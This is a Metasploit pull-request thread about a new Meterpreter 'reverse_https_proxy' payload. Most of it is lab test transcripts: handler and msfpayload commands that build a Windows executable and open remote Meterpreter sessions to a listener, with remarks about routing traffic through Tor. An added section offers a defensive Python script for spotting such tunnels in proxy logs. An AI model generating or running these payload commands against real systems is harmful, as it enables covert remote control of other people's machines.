New payload meterpreter reverse_https_proxy #1044

Closed

@corelanc0d3r

This payload is a variation on the reverse_https payload.

It allows you to specify a custom proxy IP and port, and all http/https traffic will be forced to use that proxy, regardless of the system proxy settings.

Will post test results in a few moments.

Note: I have compiled metsrv.dll with MS Visual C++ 2010 Express.
The binary appears to be smaller, but works well.
If you're cautious about using the dll in this PR, feel free to recompile.
Changes to server_setup.c are part of this PR, so this should be trivial.
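
Because this payload forces the stage's traffic through an explicit proxy, the proxy's access log is where a defender sees it. The script below is an added example, not part of this PR or of Metasploit: it parses constructed proxy log lines in a simplified "epoch client method target status" format (assumed here, not any real proxy's format) and flags CONNECT tunnels that go to an IP-literal destination, use a port other than 443, or recur at a regular interval, which is what the transcripts in this thread (handler on 192.168.1.129:8443, client behind 192.168.1.178:8080) would look like from the proxy's side.

```python
"""Flag explicit-proxy CONNECT tunnels that look like a reverse HTTPS beacon.

Added example for the PR discussion; the log format and sample lines are
constructed for illustration and are not from any real proxy.
"""
import ipaddress
import re
import statistics
from collections import defaultdict

# Constructed sample log: "epoch client method target status".
# The 192.168.1.x addresses mirror the test setup described in the thread.
SAMPLE_LOG = """\
1352376000 192.168.1.178 CONNECT 192.168.1.129:8443 200
1352376001 192.168.1.50 GET http://www.example.com/index.html 200
1352376005 192.168.1.178 CONNECT 192.168.1.129:8443 200
1352376007 192.168.1.50 CONNECT www.example.com:443 200
1352376010 192.168.1.178 CONNECT 192.168.1.129:8443 200
1352376015 192.168.1.178 CONNECT 192.168.1.129:8443 200
1352376020 192.168.1.50 CONNECT www.example.com:443 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+(?P<status>\d{3})$"
)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = int(rec["ts"])
    return rec


def split_target(target):
    """Split a CONNECT target 'host:port' into (host, port); port is None if absent.

    Bracketed IPv6 literals keep their brackets in the host part.
    """
    host, _, port = target.rpartition(":")
    if not host:  # no colon at all
        return target, None
    return host, int(port) if port.isdigit() else None


def is_ip_literal(host):
    """True if the destination is a bare IP address rather than a hostname."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def find_suspicious_tunnels(log_text, min_hits=3, max_jitter=2.0, allowed_ports=(443,)):
    """Group CONNECT requests by (client, target) and report the ones that stand out.

    A group is reported when the destination is an IP literal, when the tunnel
    port is not in allowed_ports, or when at least min_hits tunnels were opened
    at nearly constant spacing (population std-dev of the gaps <= max_jitter).
    """
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "CONNECT":
            groups[(rec["client"], rec["target"])].append(rec["ts"])

    findings = []
    for (client, target), stamps in groups.items():
        host, port = split_target(target)
        reasons = []
        if is_ip_literal(host):
            reasons.append("ip-literal destination")
        if port not in allowed_ports:
            reasons.append(f"non-standard tunnel port {port}")
        stamps.sort()
        if len(stamps) >= min_hits:
            gaps = [b - a for a, b in zip(stamps, stamps[1:])]
            if statistics.pstdev(gaps) <= max_jitter:
                reasons.append(
                    f"regular interval ~{statistics.mean(gaps):.0f}s over {len(stamps)} tunnels"
                )
        if reasons:
            findings.append(
                {"client": client, "target": target, "hits": len(stamps), "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for f in find_suspicious_tunnels(SAMPLE_LOG):
        print(f"{f['client']} -> {f['target']} ({f['hits']} tunnels): {', '.join(f['reasons'])}")
```

On the sample above only the 192.168.1.178 -> 192.168.1.129:8443 group is reported (IP-literal destination, port 8443, four tunnels five seconds apart); the www.example.com:443 tunnels are left alone. The thresholds are deliberately simple so the logic is readable; a real deployment would tune min_hits and max_jitter against its own baseline.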

@corelanc0d3r

Test results:

reverse_tcp

Juans-MacBook-Pro:msfdev juan$ ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.129 E

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.129
[*] Started reverse handler on 192.168.1.129:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.178
[*] Meterpreter session 1 opened (192.168.1.129:4444 -> 192.168.1.178:1999) at 2012-11-08 12:15:22 +0100

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit

reverse_http no system proxy

Juans-MacBook-Pro:msfdev juan$ rvmsudo ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_http LHOST=192.168.1.129 E

PAYLOAD => windows/meterpreter/reverse_http
LHOST => 192.168.1.129
[*] Started HTTP reverse handler on http://192.168.1.129:8080/
[*] Starting the payload handler...


[*] 192.168.1.178:2058 Request received for /5nJo...
[*] 192.168.1.178:2058 Staging connection for target /5nJo received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641772...
[*] Patched Communication Timeout at offset 641776...
[*] Meterpreter session 1 opened (192.168.1.129:8080 -> 192.168.1.178:2058) at 2012-11-08 12:19:26 +0100

meterpreter > 
meterpreter > 
meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

reverse_https no system proxy

Juans-MacBook-Pro:msfdev juan$ rvmsudo ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=192.168.1.129 E

PAYLOAD => windows/meterpreter/reverse_https
LHOST => 192.168.1.129
[*] Started HTTPS reverse handler on https://192.168.1.129:8443/
[*] Starting the payload handler...
[*] 192.168.1.178:2152 Request received for /j8wC...
[*] 192.168.1.178:2152 Staging connection for target /j8wC received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641772...
[*] Patched Communication Timeout at offset 641776...
[*] Meterpreter session 1 opened (192.168.1.129:8443 -> 192.168.1.178:2152) at 2012-11-08 12:20:13 +0100

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

reverse_https_proxy (obviously with proxy)

msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_https_proxy):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   EXITFUNC   process          yes       Exit technique: seh, thread, process, none
   LHOST                       yes       The local listener hostname
   LPORT      8443             yes       The local listener port
   PROXYHOST  192.168.1.178    yes       The IP address of the proxy to use
   PROXYPORT  8080             no        The Proxy port to connect to


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > set LHOST 192.168.1.129
LHOST => 192.168.1.129
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started HTTPS reverse handler on https://192.168.1.129:8443/
[*] Starting the payload handler...
[*] 192.168.1.178:2798 Request received for /SVnE...
[*] 192.168.1.178:2798 Staging connection for target /SVnE received...
[*] Patched user-agent at offset 641512...
[*] Activated custom proxy 192.168.1.178:8080, patch at offset 641776...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641880...
[*] Patched Communication Timeout at offset 641884...
[*] Meterpreter session 1 opened (192.168.1.129:8443 -> 192.168.1.178:2798) at 2012-11-08 13:23:38 +0100

meterpreter > 


Juans-MacBook-Pro:msfdev juan$ ./msfpayload windows/meterpreter/reverse_https_proxy LHOST=192.168.1.129 LPORT=8443 PROXYHOST=192.168.1.178 PROXYPORT=8080  X > met-reverse_https_proxy.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_https_proxy
 Length: 400
Options: {"LHOST"=>"192.168.1.129", "LPORT"=>"8443", "PROXYHOST"=>"192.168.1.178", "PROXYPORT"=>"8080"}

reverse_http with system proxy active

msf  exploit(handler) > set LPORT 8081
LPORT => 8081
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.129    yes       The local listener hostname
   LPORT     8081             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started HTTP reverse handler on http://192.168.1.129:8081/
[*] Starting the payload handler...
[*] 192.168.1.178:4110 Request received for /t2pF...
[*] 192.168.1.178:4110 Staging connection for target /t2pF received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641880...
[*] Patched Communication Timeout at offset 641884...
[*] Meterpreter session 2 opened (192.168.1.129:8081 -> 192.168.1.178:4110) at 2012-11-08 14:00:19 +0100

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

reverse_https with system proxy active

msf > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The local listener hostname
   LPORT     8443             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > set LHOST 192.168.1.129
LHOST => 192.168.1.129
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started HTTPS reverse handler on https://192.168.1.129:8443/
[*] Starting the payload handler...

[*] 192.168.1.178:3867 Request received for /yZR7...
[*] 192.168.1.178:3867 Staging connection for target /yZR7 received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641880...
[*] Patched Communication Timeout at offset 641884...
[*] Meterpreter session 1 opened (192.168.1.129:8443 -> 192.168.1.178:3867) at 2012-11-08 13:55:19 +0100

meterpreter > 
meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

@jvazquez-r7

Helped @corelanc0d3r with basic testing of reverse_tcp, reverse_http, reverse_https and reverse_https_proxy, just look at his pasties :)

Payloads are working well in the tests done.

To make testing of the reverse_https_proxy case easy, WebScarab works well. We used the version 20070504-1631: http://sourceforge.net/projects/owasp/files/WebScarab/20070504-1631/

@corelanc0d3r

yep, thanks a million, Juan, for testing!!

if anyone else wants to test, make sure all traffic is sent through the proxy (in case a proxy is active, either via system proxy settings, or explicitly via reverse_https_proxy) and doesn't try to connect directly

@sempervictus

Compiled from source, tested extensively against a Windows XP VM, pushing through polipo, outside proxies, and over http->socks->tor (which is going to make incident response that much more fun from here on out). The latter is obviously molasses slow, but functional.

One thing I noticed is that server_setup.c ended up with a bunch of odd ASCII trailing chars and whitespace. I cleaned up the source and threw it in a branch in my repo, but it's just encoding conversion and an rstrip for every line.

Thank you for the payload, it's sure to inspire security budget increases for 2013.

@corelanc0d3r

awesome, thanks for testing... :-)

@wchen-r7

This works for me, too. But I'm not sure how egypt wants to handle accepting the binary file. I get the impression he usually prefers to do it by himself.

@corelanc0d3r

heh of course - I don't expect anyone to trust/merge my dll...

luckily it's pretty easy to compile a fresh one nowadays.. :)

@mubix

bump?

@jlee-r7 jlee-r7 was assigned Mar 15, 2013
@wvu-r7

Any updates on this?

@mubix

I believe @jlee-r7 was waiting on @corelanc0d3r to split it between the meterpreter repo and msf one.

@corelanc0d3r

btw - troulouliou is working on an addition to this payload - I'm waiting for him to submit his patch to my repo and I'll submit it into the meterpreter repo

@wvu-r7

Thanks, @mubix and @corelanc0d3r. Trying not to close too many PRs. :P

@alexmaloteaux

hi corelanc0d3r; sorry, was off again during 1 month due to work duties; tor / hidden services is working through http proxy now; just need to check some stuff for direct socks connection

@jlee-r7

@wvu-r7 @mubix Yes, we're waiting on the split to the new rapid7/meterpreter repo. As soon as that's done, we should close this one.

@mubix mubix referenced this pull request in rapid7/meterpreter Jul 12, 2013
Closed

initial commit of pull #1044 to meter repo #11

@wvu-r7

That's what I was thinking, too, @jlee-r7.

@wvu-r7 wvu-r7 closed this Jul 12, 2013